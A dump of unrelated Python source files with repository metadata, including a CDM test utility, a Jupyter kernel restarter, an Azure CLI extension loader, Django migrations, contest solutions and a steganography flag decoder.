    Runs scipy.stats.mode over np.diff(xi); keepdims=True pins the
    array-shaped ModeResult this indexing relies on (scipy >= 1.9).
    """
    dl_a = np.diff(xi)
    stats_c = stats.mode(dl_a, keepdims=True)
    maxcount = stats_c[1][0]
    modes = []  # renamed from `max`, which shadowed the builtin
    i = 0
    # Collect leading entries tied with the top count (scipy.mode returns a
    # single mode, so in practice this yields one value).
    while stats_c[1][i] == maxcount:
        modes.append(stats_c[0][i])
        i += 1
        if i > len(stats_c[1])-1:
            break
    return modes
max0 = calc_mode(x1)  # most common x-step(s)
max1 = calc_mode(x2)  # most common y-step(s)
p0 = xy_a[0, 0]  # first point: candidate start of the arithmetic progression
q0 = xy_a[0, 1]
print(max0, max1)
Cost = N
# Try every candidate (x-step, y-step) pair and keep the cheapest fix-up count.
for p in max0:
    for q in max1:
        deltaxy = []
        for i in range(N):
            deltaxy.append([p0+i*p, q0+i*q])
        # NOTE(review): `deltaxy` is built but never used, and
        # `delta_array - xy_a` subtracts an (N-1, 2) slice from an (N, 2)
        # array, which raises a broadcast error for N > 1 — this section
        # looks unfinished.
        delta_array = xy_a[:-1, :]
        cost = N - np.count_nonzero(np.all(delta_array - xy_a == 0, axis=1)) + 1
        if cost < Cost:
            Cost = cost
print(Cost) | [
"wattaihei.rapyuta@gmail.com"
] | wattaihei.rapyuta@gmail.com |
6f3964bde48bab7b7df6669392c64b4f61b28b9a | bb1d191123fc62504d048a80aec8e68000b98350 | /objectModel/Python/tests/cdm/projection/attribute_context_util.py | f6f4091ba5b0f0f9dad9000ae951fb3974926195 | [
"MIT",
"CC-BY-4.0"
] | permissive | SophieBok/CDM | abb7800add80a8962f8ae5e83f64742285dc0cec | d8df31fa455fcc6afd698e3ca7ec0f8c4a6716fd | refs/heads/master | 2023-06-28T08:18:55.025410 | 2021-07-29T22:17:49 | 2021-07-29T22:17:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,977 | py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
from typing import cast
from unittest import TestCase
from cdm.enums import CdmObjectType
from cdm.objectmodel import CdmEntityDefinition, CdmAttributeContext, CdmAttributeReference, \
CdmArgumentDefinition, CdmTraitReference, CdmCollection, CdmAttributeItem, CdmAttributeGroupDefinition, \
CdmTraitCollection
class AttributeContextUtil:
    """
    Multiple test classes in projections test the attribute context tree generated for various scenarios.
    This utility class helps generate the actual attribute context generated by the scenario, so that it can be compared with expected attribute context tree.
    This also handles the validation of the expected vs. actual attribute context.
    """
    def __init__(self):
        # This string is used to concatenate all the attribute contexts and traits of an entity into one string
        # so that we can compare it to the expected output txt file.
        self._bldr = ''
    def get_attribute_context_strings(self, resolved_entity: 'CdmEntityDefinition') -> str:
        """Function to get the attribute context string tree from a resolved entity"""
        # clear the string builder
        self._bldr = ''
        # get the corpus path for each attribute context in the tree
        self._get_content_declared_path(resolved_entity.attribute_context)
        # get the traits for all the attributes of a resolved entity
        self._get_traits(resolved_entity.attributes)
        return self._bldr
    def get_argument_values_as_strings(self, args: 'CdmArgumentDefinition') -> str:
        """Render a single argument's parameter/value details as one string."""
        # clear the string builder
        self._bldr = ''
        # append this argument's parameter name, default and value(s)
        self._get_argument_values(args)
        return self._bldr
    def _get_content_declared_path(self, attrib_context: 'CdmAttributeContext') -> None:
        """Get the corpus path for each attribute context in the tree and build a string collection that we can
        compare with the expected attribute context corpus path collection."""
        if attrib_context and attrib_context.contents and len(attrib_context.contents) > 0:
            for i in range(len(attrib_context.contents)):
                content = attrib_context.contents[i]
                self._bldr += content.at_corpus_path
                self._bldr += '\n'
                # attribute references are leaves; anything else may nest further contexts
                if not isinstance(content, CdmAttributeReference):
                    self._get_content_declared_path(content)
    def _get_traits(self, attributes: 'CdmCollection[CdmAttributeItem]') -> None:
        """Get the traits for all the attributes of a resolved entity"""
        for attrib in attributes:
            attrib_corpus_path = attrib.at_corpus_path
            self._bldr += attrib_corpus_path
            self._bldr += '\n'
            from cdm.objectmodel import CdmAttributeGroupReference
            if isinstance(attrib, CdmAttributeGroupReference):
                # attribute groups carry their own traits plus nested members
                att_group_def = cast(CdmAttributeGroupReference, attrib).explicit_reference # type: CdmAttributeGroupDefinition
                self._bldr += att_group_def.at_corpus_path
                self._bldr += '\n'
                self._get_trait_collection(att_group_def.exhibits_traits)
                self._get_traits(att_group_def.members)
            else:
                self._get_trait_collection(attrib.applied_traits)
    def _get_trait_collection(self, trait_collection: 'CdmTraitCollection') -> None:
        """Append each trait's named reference and its argument values."""
        for trait in trait_collection:
            attrib_traits = trait.named_reference
            self._bldr += attrib_traits
            self._bldr += '\n'
            if isinstance(trait, CdmTraitReference):
                for args in trait.arguments:
                    self._get_argument_values(args)
    def _get_argument_values(self, args: 'CdmArgumentDefinition') -> None:
        """Append a printable description of an argument's resolved parameter and value."""
        param_name = args._resolved_parameter.name if args._resolved_parameter else None
        param_default_value = args._resolved_parameter.default_value if args._resolved_parameter else None
        if param_name or param_default_value:
            self._bldr += '  [Parameter (Name / DefaultValue): {} / {}]'.format(param_name if param_name else '', param_default_value if param_default_value else '')
            self._bldr += '\n'
        # the argument value may be a plain string, a simple named reference,
        # or an explicit constant-entity reference
        if isinstance(args.value, str):
            args_value = args.value
            if args_value:
                self._bldr += '  [Argument Value: {}]'.format(args_value)
                self._bldr += '\n'
        elif args.value.simple_named_reference == True if args.value else False:
            args_value = args.value.named_reference
            if args_value:
                self._bldr += '  [Argument Value: {}]'.format(args_value)
                self._bldr += '\n'
        elif args.value.explicit_reference.object_type == CdmObjectType.CONSTANT_ENTITY_DEF if args.value else False:
            const_ent = args.value.explicit_reference
            if const_ent:
                # NOTE(review): `refs` is assigned but never used.
                refs = []
                for val in const_ent.constant_values:
                    self._bldr += '  [Argument Value: {}]'.format(','.join(val))
                    self._bldr += '\n'
    @staticmethod
    async def validate_attribute_context(test: 'TestCase', expected_output_path: str, entity_name: str, resolved_entity: 'CdmEntityDefinition', update_expected_output: bool = False) -> None:
        """A function to validate if the attribute context tree & traits generated for a resolved entity is the same
        as the expected and saved attribute context tree & traits for a test case"""
        if resolved_entity.attribute_context:
            attr_ctx_util = AttributeContextUtil()
            # Actual
            actual_file_path = os.path.join(expected_output_path.replace('ExpectedOutput', 'ActualOutput'), 'AttrCtx_{}.txt'.format(entity_name))
            # Save Actual AttrCtx_*.txt and Resolved_*.cdm.json
            actual_text = attr_ctx_util.get_attribute_context_strings(resolved_entity)
            with open(actual_file_path, 'w') as actual_attr_ctx_file:
                actual_attr_ctx_file.write(actual_text)
            await resolved_entity.in_document.save_as_async('Resolved_{}.cdm.json'.format(entity_name), False)
            # Expected
            expected_file_path = os.path.join(expected_output_path, 'AttrCtx_{}.txt'.format(entity_name))
            if update_expected_output:
                # refresh the golden file instead of comparing against it
                with open(expected_file_path, 'w') as expected_attr_ctx_file:
                    expected_attr_ctx_file.write(actual_text)
            with open(expected_file_path) as expected_file:
                expected_text = expected_file.read()
            # Test if Actual is Equal to Expected
            test.assertEqual(expected_text.replace('\r\n', '\n'), actual_text.replace('\r\n', '\n'))
| [
"cdm-publisher@outlook.com"
] | cdm-publisher@outlook.com |
01a51587d08e7eee45b2ac648941684c741f4abd | 8eab8ab725c2132bb8d090cdb2d23a5f71945249 | /virt/Lib/site-packages/jupyter_client/ioloop/restarter.py | 54f96af8d53a14c53abb5436c8a59c9e7b61c8f9 | [
"MIT"
] | permissive | JoaoSevergnini/metalpy | 6c88a413a82bc25edd9308b8490a76fae8dd76ca | c2d0098a309b6ce8c756ff840bfb53fb291747b6 | refs/heads/main | 2023-04-18T17:25:26.474485 | 2022-09-18T20:44:45 | 2022-09-18T20:44:45 | 474,773,752 | 3 | 1 | MIT | 2022-11-03T20:07:50 | 2022-03-27T22:21:01 | Python | UTF-8 | Python | false | false | 3,905 | py | """A basic in process kernel monitor with autorestarting.
This watches a kernel's state using KernelManager.is_alive and auto
restarts the kernel if it dies.
"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import asyncio
import time
import warnings
from traitlets import Instance
from zmq.eventloop import ioloop
from jupyter_client.restarter import KernelRestarter
from jupyter_client.utils import run_sync
class IOLoopKernelRestarter(KernelRestarter):
    """Monitor and autorestart a kernel."""
    loop = Instance("tornado.ioloop.IOLoop")
    def _loop_default(self):
        warnings.warn(
            "IOLoopKernelRestarter.loop is deprecated in jupyter-client 5.2",
            DeprecationWarning,
            stacklevel=4,
        )
        return ioloop.IOLoop.current()
    # Handle of the active PeriodicCallback; None while polling is stopped.
    _pcallback = None
    def start(self):
        """Start the polling of the kernel."""
        if self._pcallback is None:
            # run_sync bridges a coroutine poll() into the callback-based loop
            if asyncio.iscoroutinefunction(self.poll):
                cb = run_sync(self.poll)
            else:
                cb = self.poll
            # poll every time_to_dead seconds (PeriodicCallback wants ms)
            self._pcallback = ioloop.PeriodicCallback(
                cb,
                1000 * self.time_to_dead,
            )
            self._pcallback.start()
    def stop(self):
        """Stop the kernel polling."""
        if self._pcallback is not None:
            self._pcallback.stop()
            self._pcallback = None
class AsyncIOLoopKernelRestarter(IOLoopKernelRestarter):
    """Async variant whose poll() awaits the kernel manager's coroutine API."""
    async def poll(self):
        if self.debug:
            self.log.debug("Polling kernel...")
        is_alive = await self.kernel_manager.is_alive()
        now = time.time()
        if not is_alive:
            self._last_dead = now
            # track how many consecutive restarts have been attempted
            if self._restarting:
                self._restart_count += 1
            else:
                self._restart_count = 1
            if self._restart_count > self.restart_limit:
                # too many consecutive failures: give up and stop polling
                self.log.warning("AsyncIOLoopKernelRestarter: restart failed")
                self._fire_callbacks("dead")
                self._restarting = False
                self._restart_count = 0
                self.stop()
            else:
                newports = self.random_ports_until_alive and self._initial_startup
                self.log.info(
                    "AsyncIOLoopKernelRestarter: restarting kernel (%i/%i), %s random ports",
                    self._restart_count,
                    self.restart_limit,
                    "new" if newports else "keep",
                )
                self._fire_callbacks("restart")
                await self.kernel_manager.restart_kernel(now=True, newports=newports)
                self._restarting = True
        else:
            # Since `is_alive` only tests that the kernel process is alive, it does not
            # indicate that the kernel has successfully completed startup. To solve this
            # correctly, we would need to wait for a kernel info reply, but it is not
            # necessarily appropriate to start a kernel client + channels in the
            # restarter. Therefore, we use "has been alive continuously for X time" as a
            # heuristic for a stable start up.
            # See https://github.com/jupyter/jupyter_client/pull/717 for details.
            stable_start_time = self.stable_start_time
            if self.kernel_manager.provisioner:
                stable_start_time = self.kernel_manager.provisioner.get_stable_start_time(
                    recommended=stable_start_time
                )
            if self._initial_startup and now - self._last_dead >= stable_start_time:
                self._initial_startup = False
            if self._restarting and now - self._last_dead >= stable_start_time:
                self.log.debug("AsyncIOLoopKernelRestarter: restart apparently succeeded")
                self._restarting = False
"joao.a.severgnini@gmail.com"
] | joao.a.severgnini@gmail.com |
7765ceccb21016a4bb1507aef9301ffcf28ddf22 | 9d123c6b87b0baf80a6fce070023e19d68048b90 | /slothql/utils/laziness.py | 1a0de52539dcd75a2ec5e2830f3abfe6a44fd19b | [
"MIT"
] | permissive | IndioInc/slothql | ea4da3727cb974360eeb3b38517ead4328687e81 | 64a574013e249968746044555bd8779ac353b13f | refs/heads/master | 2021-05-08T11:07:34.420797 | 2018-04-14T02:08:55 | 2018-04-14T02:08:55 | 119,881,523 | 2 | 0 | MIT | 2018-04-15T01:31:10 | 2018-02-01T19:16:50 | Python | UTF-8 | Python | false | false | 1,160 | py | lazy_proxy_attrs = ['_LazyInitProxy' + i for i in ('__obj', '__new', '__cls', '__args', '__kwargs', '__lazy_init')]
class LazyInitProxy:
    """Transparent proxy that defers construction of the wrapped object.

    The real object is only allocated (via *new*) and initialized (via
    ``__init__``) on the first attribute get/set that is not one of the
    proxy's own bookkeeping attributes.
    """

    # Mangled names of the proxy's own attributes; any other attribute
    # access is forwarded to the lazily built target object.
    _OWN_ATTRS = frozenset('_LazyInitProxy' + n for n in (
        '__obj', '__new', '__cls', '__args', '__kwargs', '__lazy_init'))

    def __init__(self, new, cls, *args, **kwargs):
        self.__obj = None      # wrapped instance, created on demand
        self.__new = new       # allocator, e.g. SomeClass.__new__
        self.__cls = cls       # class the proxy impersonates
        self.__args = args     # positional args for the deferred __init__
        self.__kwargs = kwargs  # keyword args for the deferred __init__

    def __lazy_init(self):
        # Build the target object exactly once.  Checking `is None` (rather
        # than truthiness) avoids re-initializing targets whose instances
        # are falsy.
        if self.__obj is None:
            self.__obj = self.__new(self.__cls)
            self.__obj.__init__(*self.__args, **self.__kwargs)

    def __getattribute__(self, name):
        # Report the proxied class so type inspection sees the target class.
        # (`==` instead of the original `is`: identity of string literals is
        # an interning accident, not a guarantee.)
        if name == '__class__':
            return self.__cls
        if name in LazyInitProxy._OWN_ATTRS:
            return super().__getattribute__(name)
        self.__lazy_init()
        return type(self.__obj).__getattribute__(self.__obj, name)

    def __setattr__(self, key, value):
        if key in LazyInitProxy._OWN_ATTRS:
            return super().__setattr__(key, value)
        self.__lazy_init()
        return type(self.__obj).__setattr__(self.__obj, key, value)
class LazyInitMixin:
    # Inheriting classes are instantiated as LazyInitProxy wrappers, so the
    # real __init__ only runs on the first genuine attribute access.
    @staticmethod
    def __new__(cls, *args, **kwargs):
        return LazyInitProxy(super(LazyInitMixin, cls).__new__, cls, *args, **kwargs)
| [
"karol.gruszczyk@gmail.com"
] | karol.gruszczyk@gmail.com |
c6924b59c81ca5e1180e6818f3e2b742947490af | c50e7eb190802d7849c0d0cea02fb4d2f0021777 | /src/spring-cloud/azext_spring_cloud/__init__.py | f1f6829e24f83bb03b037a169d016f4c6295b128 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | Azure/azure-cli-extensions | c1615b19930bba7166c282918f166cd40ff6609c | b8c2cf97e991adf0c0a207d810316b8f4686dc29 | refs/heads/main | 2023-08-24T12:40:15.528432 | 2023-08-24T09:17:25 | 2023-08-24T09:17:25 | 106,580,024 | 336 | 1,226 | MIT | 2023-09-14T10:48:57 | 2017-10-11T16:27:31 | Python | UTF-8 | Python | false | false | 1,614 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core import AzCommandsLoader
from azure.cli.core.commands import CliCommandType
from azext_spring_cloud._help import helps # pylint: disable=unused-import
from azext_spring_cloud._client_factory import cf_spring_cloud
from azext_spring_cloud.commands import load_command_table
from azext_spring_cloud._params import load_arguments
class spring_cloudCommandsLoader(AzCommandsLoader):
    # Azure CLI command loader for the spring-cloud extension.
    def __init__(self, cli_ctx=None):
        # Custom command implementations live in azext_spring_cloud.custom.
        spring_cloud_custom = CliCommandType(
            operations_tmpl='azext_spring_cloud.custom#{}',
            client_factory=cf_spring_cloud)
        super(spring_cloudCommandsLoader, self).__init__(cli_ctx=cli_ctx, custom_command_type=spring_cloud_custom)
    def load_command_table(self, args):
        from azure.cli.core.aaz import load_aaz_command_table
        # Register auto-generated (aaz) commands first, when the package ships them.
        try:
            from . import aaz
        except ImportError:
            aaz = None
        if aaz:
            load_aaz_command_table(
                loader=self,
                aaz_pkg_name=aaz.__name__,
                args=args
            )
        # Then register the hand-written command table.
        load_command_table(self, args)
        return self.command_table
    def load_arguments(self, command):
        # Argument definitions are kept in _params.load_arguments.
        load_arguments(self, command)
# Entry-point class the Azure CLI uses to load this extension.
COMMAND_LOADER_CLS = spring_cloudCommandsLoader
| [
"noreply@github.com"
] | Azure.noreply@github.com |
20e79c2fadd832d61fd5bea20ef637c8f7e01edc | 53e4a89e8baeb715f10b33304be028e906e58583 | /practice.py | d434fefa456bfbb3d8eb507660a7137ff77e4ce5 | [] | no_license | eodnjs467/python | 9a9cf2c82a6c64d839c4de4bc38fe3df14f11f5d | 67b2a770526f4c4161bcf06042eea3054a30b3fc | refs/heads/master | 2020-09-30T20:33:51.627921 | 2020-04-12T15:13:47 | 2020-04-12T15:13:47 | 227,368,131 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | import itertools
def solution(M, load):
    """Apparent goal (unfinished): choose item pairs whose weight sum best
    fits a 40-unit truck.

    NOTE(review): this function is work-in-progress and currently broken:
    - the `M` and `load` parameters are immediately overwritten by input(),
    - `M > 40` compares the str returned by input() against an int (TypeError),
    - iterating the raw input string makes `load[index] > 12` a str/int compare,
    - the dangling `middle =` assignment below is a syntax error.
    """
    a=[]
    count = 0
    M = input("트럭에 실을 수 있는 최대 무게를 설정해주세요.")
    if M>40: print("40이하로 입력하세요")
    load = input("[1,2,3,4,5,6] 처럼 입력하세요 최대 12개 ")
    for index in range(len(load)):
        if load[index] > 12:
            print("12이하로 설정하세요")
            count = count+1
    if count == len(load):
        return -1
    a.append(load[index])
    b = itertools.combinations(a,2)
    c = list(b)
    for i in range(1):
        for j in range(1):
            middle = 40 - (c[i][j] + c[i][j+1])
            middle = ## need to find the one closest to 0
    # load_max = 40
    # min = 0
    answer = 0
    return answer
"sponjjanc@naver.com"
] | sponjjanc@naver.com |
48dafa5e87dcad260228db02752c101b9cd39502 | eae6dddca9285702c4c7ed6ba6bdaceef9631df2 | /CCC-2018/Senior/Senior-1/S1.py | a7e1fce447c03ec8b63cb22e911da9b2757d0261 | [] | no_license | simrit1/CCC-Solutions-2 | 7823ce14801c4219f6f1dd4c42fb013c2dfc45dd | ee2883aa38f933e526ce187d50ca68763876cb58 | refs/heads/master | 2023-07-04T02:19:37.320261 | 2021-08-07T22:12:36 | 2021-08-07T22:12:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 710 | py | # CCC 2018 Senior 1: Voronoi Villages
#
# Author: Charles Chen
#
# Arrays and calculations
# Initialize variables
min_size = 20000000000
size_left = 0
size_right = 0
total_size = 0
# Input
points = []
num_villages = int(input())
for i in range(num_villages):
    points.append(int(input()))
# Sort the points
points.sort()
# Find smallest neighbourhood size
# Each inner village's neighbourhood spans halfway to each adjacent village;
# the two endpoint villages are excluded by the range below.
for i in range(1, num_villages - 1):
    diff_left = points[i] - points[i-1]
    diff_right = points[i+1] - points[i]
    size_left = diff_left / 2
    size_right = diff_right / 2
    total_size = size_left + size_right
    if total_size < min_size:
        min_size = total_size
# Report the smallest neighbourhood size with one decimal place.
print("{:.1f}".format(min_size))
| [
"noreply@github.com"
] | simrit1.noreply@github.com |
f1997085668d1db3776b1d54457a43aacfbba33c | 3cb0f57347d06d976ae49812fa383e8845475c62 | /WebServices/trunk/setup.py | 0774bdab90c2feba99bbb78d8f7ceb7a7f8dc7e6 | [] | no_license | UfSoft/ISPManCCP-V2 | 9aa99731e54c39fd05ed5cf969e2e3dcbd444f7e | 1521cea43254d017129b07c07266a0e3bfd64ab1 | refs/heads/master | 2021-01-10T20:26:42.282246 | 2008-05-10T15:13:56 | 2008-05-10T15:13:56 | 26,618,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 637 | py | #!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='ISPManWebServices',
version='0.1',
description='WebServices backend to ISPMan',
author='Pedro Algarvio',
author_email='ufs@ufsoft.org',
# url='',
install_requires=["Pylons>=0.9.6.1"],
packages=find_packages(exclude=['ez_setup']),
include_package_data=True,
test_suite='nose.collector',
package_data={'ispman.services': ['i18n/*/LC_MESSAGES/*.mo']},
entry_points="""
[paste.app_factory]
main = ispman.services.wsgiapp:make_app
[paste.app_install]
main = pylons.util:PylonsInstaller
""",
)
| [
"ufs@ufsoft.org"
] | ufs@ufsoft.org |
9f5d1f6f7e14b928ee57ce640f3ef14235c95b2f | 339dbd84a793588d7c278e2c68c08fff6cdd7b5a | /ImuData/ImuPreProcess.py | 25817f3b675e881527a31405d7b2a963fa14e676 | [] | no_license | wystephen/LightPythonProject | 3a7f2b31f1d8a2da109bb6e0783dd996d2ffaa12 | d2a356029a18ce428b3e33622f9ce1de3f8907c1 | refs/heads/master | 2021-04-27T03:57:09.016236 | 2018-04-03T02:51:37 | 2018-04-03T02:51:37 | 122,722,155 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,429 | py | # -*- coding:utf-8 -*-
# carete by steve at 2018 / 03 / 03 13:44
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import re
import time
import datetime
class imuread:
    """Reader for IMU text exports.

    ``load`` parses per-sample lines into ``self.data`` with one row per
    sample: column 0 is a POSIX timestamp built from the line's date/time
    fields, and columns 1-9 hold the last nine numeric fields of the line.
    """

    def __init__(self, file_name='MT_07700791-003-000.csv'):
        self.file_name = file_name  # path of the export to parse

    def load(self):
        """Parse the file (skipping the first 7 header lines) into self.data."""
        # Matches signed numbers with up to three integer digits and an
        # optional fractional part, e.g. "-12.5", "3", "0.125".  Compiled
        # once here instead of once per line, and written as a raw string
        # to avoid the invalid '\.' escape warning.
        number_pattern = re.compile(r'[-]{0,1}[0-9]{1,3}\.{0,1}[0-9]{0,15}')
        # `with` guarantees the file handle is closed (the original leaked it).
        with open(self.file_name) as source:
            file_lines = source.readlines()
        self.data = np.zeros([len(file_lines) - 7, 10])
        for i in range(7, len(file_lines)):
            all_num = number_pattern.findall(file_lines[i])
            # Fields 2..7 hold the wall-clock date/time of the sample.
            tt = datetime.datetime(int(all_num[2]), int(all_num[3]), int(all_num[4]), int(all_num[5]), int(all_num[6]),
                                   int(all_num[7]))
            # NOTE(review): the printed timestamp uses all_num[1] for the
            # sub-second part while the stored one uses all_num[0] —
            # preserved as-is; confirm which field is intended.
            print(tt.timestamp() + float(all_num[1]) * 1e-9)
            self.data[i - 7, 0] = tt.timestamp() + float(all_num[0]) * 1e-9
            # The last nine numbers on the line are the sensor channels.
            for j in range(9):
                self.data[i - 7, 1 + j] = float(all_num[j + len(all_num) - 9])

    def save(self, file_name):
        """Write the parsed samples to *file_name* as plain text."""
        np.savetxt(file_name, self.data)
if __name__ == '__main__':
    # Smoke run: parse one recorded IMU log when executed directly.
    ir = imuread(file_name='2018-03-03-17h35.TXT')
    ir.load()
| [
"551619855@qq.com"
] | 551619855@qq.com |
fed51cebf5fbf3c46d9c33bc71716accfdcaad96 | 53def173f44b9665d1194195577c50058c1f698a | /angstromctf/2020/misc/msd/solve.py | bbc29a69de3b8584e6a90560da9c5fc093b7af47 | [] | no_license | blairsec/challenges | 3558f2b7f6866718c4f1ad026d84b6651e31e7d0 | 928345a6175adf0e88017b28fe895bc924527853 | refs/heads/master | 2023-05-24T09:44:17.779099 | 2023-05-17T17:03:34 | 2023-05-17T17:03:34 | 184,929,220 | 17 | 6 | null | 2023-03-03T17:21:31 | 2019-05-04T18:12:01 | JavaScript | UTF-8 | Python | false | false | 790 | py | from PIL import Image
im = Image.open("output.png")
im2 = Image.open("breathe.jpg")
width, height = im.size
def decode(i, compare):
    # Zero-pad str(i) to the width of str(compare) and return the leading
    # character of the padded string.
    padded = str(i).zfill(len(str(compare)))
    return padded[0]
s = ""
for j in range(height):
for i in range(width):
data = []
for a, compare in zip(im.getpixel((i,j)), im2.getpixel((i, j))):
data.append(decode(a, compare))
s += ''.join(data)
s = list(s)
data = []
while len(s) > 0:
t = ""
curr = s.pop(0)
if curr != "1":
t += curr + s.pop(0)
else:
t += curr + s.pop(0) + s.pop(0)
data.append(t)
data = ''.join([chr(int(i)) for i in data])
import re
r1 = re.findall(r"actf{.*?}", data)
min = min(map(len, r1))
for i in r1:
if len(i) == min:
print(i)
| [
"github@kevinhiggs.com"
] | github@kevinhiggs.com |
02392e079a451cabcac5107b47c21e5b66bc1c35 | 515e45025082ffbfda960635e31f99c4ca1aa7d8 | /src/html5_parser/stdlib_etree.py | 8fd1a4e10e7347e79a7c21a3e752c474e3806553 | [
"Apache-2.0"
] | permissive | kovidgoyal/html5-parser | 62a3e626cba563076c7503fafb2fd83c506c61dd | ef7d4af932293fa04c3ac78a77b7fb2f0ac2f26d | refs/heads/master | 2023-05-30T09:44:52.629086 | 2023-04-12T05:07:46 | 2023-04-12T05:07:46 | 93,229,662 | 714 | 42 | Apache-2.0 | 2021-07-26T13:23:04 | 2017-06-03T06:56:36 | C | UTF-8 | Python | false | false | 1,525 | py | #!/usr/bin/env python
# vim:fileencoding=utf-8
# License: Apache 2.0 Copyright: 2017, Kovid Goyal <kovid at kovidgoyal.net>
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
from lxml.etree import _Comment
if sys.version_info.major < 3:
from xml.etree.cElementTree import Element, SubElement, ElementTree, Comment, register_namespace
else:
from xml.etree.ElementTree import Element, SubElement, ElementTree, Comment, register_namespace
register_namespace('svg', "http://www.w3.org/2000/svg")
register_namespace('xlink', "http://www.w3.org/1999/xlink")
def convert_elem(src, parent=None):
    # Recreate src's tag and attributes as a fresh element; attach it to
    # parent when one is given, otherwise return a standalone element.
    attrs = dict(src.items())
    if parent is not None:
        return SubElement(parent, src.tag, attrs)
    return Element(src.tag, attrs)
def adapt(src_tree, return_root=True, **kw):
    """Copy an lxml tree into stdlib ElementTree elements.

    Walks the source tree iteratively, cloning elements (and comments,
    preserving their text/tail) into a parallel stdlib tree.  Returns the
    new root element, or a full ElementTree when return_root is False.
    """
    src_root = src_tree.getroot()
    dest_root = convert_elem(src_root)
    stack = [(src_root, dest_root)]
    while stack:
        src, dest = stack.pop()
        for src_child in src.iterchildren():
            if isinstance(src_child, _Comment):
                # comments are copied directly and never recursed into
                dest_child = Comment(src_child.text)
                dest_child.tail = src_child.tail
                dest.append(dest_child)
            else:
                dest_child = convert_elem(src_child, dest)
                dest_child.text, dest_child.tail = src_child.text, src_child.tail
                stack.append((src_child, dest_child))
    return dest_root if return_root else ElementTree(dest_root)
| [
"kovid@kovidgoyal.net"
] | kovid@kovidgoyal.net |
8202d586e8a0a42e46ec0f99eeaa08e3b64a791a | 01ab44468c01151020031de57402a08c76d8efb6 | /App/migrations/0006_tweets_time.py | 0911cdd9a48f8b4b454465905453ad8dbfe208ad | [] | no_license | Chukslord1/Arctype_Tweets_Heatmap | 33c46d8d7a7ac24d05e3cda7e6c7525111d05257 | 16e377dfc215be46786e17e4cf35e89a2b7f4395 | refs/heads/main | 2023-06-19T22:59:53.127630 | 2021-07-19T01:00:32 | 2021-07-19T01:00:32 | 376,182,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 523 | py | # Generated by Django 3.1.7 on 2021-06-16 03:31
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # Auto-generated Django migration: adds a `time` column to `tweets`.
    dependencies = [
        ('App', '0005_auto_20210615_2339'),
    ]
    operations = [
        # The datetime literal is only the one-off value Django used to
        # back-fill existing rows; preserve_default=False means it is not
        # kept as the field default going forward.
        migrations.AddField(
            model_name='tweets',
            name='time',
            field=models.TextField(default=datetime.datetime(2021, 6, 16, 3, 31, 2, 119115, tzinfo=utc)),
            preserve_default=False,
        ),
    ]
| [
"chukslord1@gmail.com"
] | chukslord1@gmail.com |
8903f5552458a212377dedd24f393aca93c9b316 | 961d2a56c1f573edebb6d67b6d5874b10ce01791 | /focusgroups/migrations/0002_auto_20160905_1705.py | 98d6390d8dbec20b23e09963f1e037db8c19bd4a | [
"MIT"
] | permissive | CARocha/ciatEspecies | d7dbf4ba09e4c9255dc2eab2eaa905960d7e96c7 | 10777d9487dd3658388243c304dd640b476cb3e3 | refs/heads/master | 2020-04-06T07:11:40.607520 | 2016-09-06T19:29:19 | 2016-09-06T19:29:19 | 60,646,256 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-09-05 17:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated Django migration: drops the `county` foreign keys and
    # adds a `province` foreign key on Community.
    dependencies = [
        ('focusgroups', '0001_initial'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='community',
            name='county',
        ),
        migrations.RemoveField(
            model_name='focusgroup',
            name='county',
        ),
        migrations.AddField(
            model_name='community',
            name='province',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='focusgroups.Province'),
        ),
    ]
| [
"erickmurillo22@gmail.com"
] | erickmurillo22@gmail.com |
985214f3ae0e8d102213d315bb2b7881b582a8f8 | db14851d3eca5fd09277715c3a0558a5f5d5894c | /dot2svg.py | 788a2be68d0f24d6c5511d6fe44e7a36cd4c5b5b | [] | no_license | marxin/script-misc | 916c007308a9ea350ade256dde0a682349a964e4 | 06f5c418b8bc4e28d5e04e3cf475f680ed7781c3 | refs/heads/master | 2023-08-23T13:13:30.567072 | 2023-08-22T14:22:59 | 2023-08-22T14:22:59 | 10,321,279 | 8 | 1 | null | 2021-03-20T10:56:59 | 2013-05-27T19:33:40 | C++ | UTF-8 | Python | false | false | 174 | py | #!/usr/bin/env python3
import glob
import subprocess
# Convert every Graphviz .dot file in the current directory to SVG.
for f in sorted(glob.glob('*.dot')):
    print(f)
    # Pass the arguments as a list (shell=False): filenames containing
    # spaces or shell metacharacters are handled safely, and there is no
    # shell-injection risk from odd file names.
    subprocess.check_output(['dot', '-Tsvg', f, '-o', f'{f}.svg'])
| [
"mliska@suse.cz"
] | mliska@suse.cz |
7c547c68f98a736486c122985b30d5e935e0a74a | 0afd765c0a3c06e6c893782fc8bd9d5bd4eac20d | /synchronized_ppo_CartPole/ppo.py | 1833d0999b1f725abd3b3573d428aea6112e227c | [] | no_license | chagmgang/synch_pysc2 | fdcb2bbb36c81af6ac2c31183b02f26aee33d739 | 57ca1e533446b1ed61c4d3d432d47d293148b6be | refs/heads/master | 2020-03-19T15:40:24.573995 | 2018-07-02T05:36:35 | 2018-07-02T05:36:35 | 136,680,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,480 | py | import tensorflow as tf
import copy
